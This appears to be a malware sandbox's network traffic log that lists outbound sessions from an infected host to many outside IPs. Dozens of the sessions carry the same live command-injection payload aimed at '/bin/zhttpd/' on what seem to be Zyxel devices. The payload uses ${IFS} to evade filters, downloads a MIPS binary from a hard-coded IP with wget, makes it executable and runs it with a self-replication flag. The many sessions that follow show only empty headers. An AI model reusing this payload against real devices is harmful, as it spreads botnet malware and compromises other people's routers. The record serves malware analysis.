                                            Jan 14, 2024 15:50:58.827750921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9568192.168.2.233282471.120.88.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827788115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9569192.168.2.2359286119.69.39.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827827930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9570192.168.2.2352980199.245.203.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827884912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9571192.168.2.2352754153.177.229.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827917099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9572192.168.2.2360546191.208.49.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827938080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9573192.168.2.2342574191.80.116.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.827992916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9574192.168.2.233473279.147.26.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828046083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9575192.168.2.2350812120.83.98.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828078985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9576192.168.2.234968412.38.90.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828100920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9577192.168.2.234956431.196.26.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828161001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9578192.168.2.234502062.80.81.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828214884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9579192.168.2.2339188178.156.247.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828252077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9580192.168.2.2351848159.95.171.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828290939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9581192.168.2.235893052.185.47.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828305006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9582192.168.2.2346334173.181.164.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828363895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9583192.168.2.235661086.12.161.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828391075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9584192.168.2.234197459.106.173.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828442097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9585192.168.2.234770032.93.35.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828490973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9586192.168.2.2360264196.102.129.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828527927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9587192.168.2.2343264154.157.198.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828579903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9588192.168.2.2353856110.4.21.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828615904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9589192.168.2.2360206187.66.29.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828649044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9590192.168.2.2349610134.188.71.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828686953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9591192.168.2.2350988189.219.161.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828754902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9592192.168.2.2333270111.50.74.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828798056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9593192.168.2.233670858.226.224.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828833103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9594192.168.2.235485471.63.3.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828866959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9595192.168.2.2339298206.248.159.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828932047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9596192.168.2.2349940208.130.155.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.828977108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9597192.168.2.234481262.144.220.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829025030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9598192.168.2.2346968172.48.67.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829052925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9599192.168.2.234750867.172.40.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829099894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9600192.168.2.233877074.146.204.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829127073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9601192.168.2.2334294176.62.255.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829190969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9602192.168.2.2354630109.145.94.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829212904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9603192.168.2.2360054166.185.161.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:58.829262972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9604192.168.2.2358206188.220.74.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9605192.168.2.2358780100.190.119.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9606192.168.2.2341982181.18.59.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9607192.168.2.234921267.153.247.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9608192.168.2.2332812125.216.160.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9609192.168.2.2354920148.243.254.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9610192.168.2.233964862.93.121.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9611192.168.2.233639687.118.45.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9612192.168.2.235565493.181.171.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9613192.168.2.2339056109.36.56.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9614192.168.2.2358790192.128.129.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9615192.168.2.2336590167.246.126.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9616192.168.2.2346556153.121.59.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9617192.168.2.2350402198.32.175.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9618192.168.2.2333102156.105.180.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9619192.168.2.234134888.182.111.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9620192.168.2.2338356195.25.194.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9621192.168.2.235352471.151.126.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9622192.168.2.2358714174.209.101.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9623192.168.2.235873253.38.202.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9624192.168.2.2338324139.118.208.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9625192.168.2.234078235.16.97.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9626192.168.2.2357588173.147.240.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9627192.168.2.235588427.89.127.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9628192.168.2.2334508111.206.185.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9629192.168.2.235226495.240.71.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9630192.168.2.2338598130.239.139.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9631192.168.2.235868686.64.239.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9632192.168.2.233567663.230.244.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9633192.168.2.234501079.18.100.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9634192.168.2.2360870216.202.169.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9635192.168.2.2352850170.245.90.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9636192.168.2.2343418160.247.253.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9637192.168.2.2341530173.200.237.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9638192.168.2.2334104102.196.199.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9639192.168.2.2341574210.47.56.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9640192.168.2.2338610217.59.31.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9641192.168.2.2346444176.34.206.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9642192.168.2.2333750155.167.251.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9643192.168.2.2348800162.21.123.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9644192.168.2.2355410124.59.245.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9645192.168.2.235939666.253.16.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9646192.168.2.2348596174.168.6.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9647192.168.2.2338518167.27.234.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9648192.168.2.2342978115.187.212.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9649192.168.2.2353146104.246.148.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9650192.168.2.2356606107.116.188.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9651192.168.2.2356942124.66.37.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9652192.168.2.23490465.233.0.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9653192.168.2.2357758156.189.13.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9654192.168.2.235056812.51.45.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9655192.168.2.2353452192.110.253.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9656192.168.2.234572848.148.212.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9657192.168.2.2338374159.10.19.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9658192.168.2.2341254197.229.17.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9659192.168.2.2333390216.55.134.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9660192.168.2.2340814218.148.42.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9661192.168.2.2346986195.57.3.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9662192.168.2.2354058183.223.90.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9663192.168.2.235619290.176.105.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9664192.168.2.234487086.94.132.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9665192.168.2.234221242.197.240.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9666192.168.2.235414678.36.143.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9667192.168.2.2337030112.86.186.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9668192.168.2.233521073.253.46.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9669192.168.2.2355980131.52.11.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9670192.168.2.233908617.61.27.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9671192.168.2.233541483.13.221.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9672192.168.2.2337746220.85.36.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9673192.168.2.2352676168.142.122.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9674192.168.2.2337160141.173.213.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9675192.168.2.23556182.129.11.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9676192.168.2.2349434212.67.182.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9677192.168.2.233357492.250.90.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9678192.168.2.235808693.126.79.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9679192.168.2.234511017.60.237.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9680192.168.2.234676069.252.249.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9681192.168.2.235591476.175.68.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9682192.168.2.2351694177.246.248.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9683192.168.2.2344652217.148.58.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9684192.168.2.234125613.228.66.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9685192.168.2.235466276.188.82.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9686192.168.2.234544277.154.1.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9687192.168.2.2340856200.107.61.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9688192.168.2.2333846167.247.192.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9689192.168.2.2357576135.213.39.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9690192.168.2.233285260.79.228.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9691192.168.2.2349410148.139.11.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9692192.168.2.23434789.138.3.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9693192.168.2.235974412.140.161.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9694192.168.2.2346802135.219.227.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9695192.168.2.2341892170.7.238.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9696192.168.2.2355950174.225.141.12443
                                            TimestampBytes transferredDirectionData


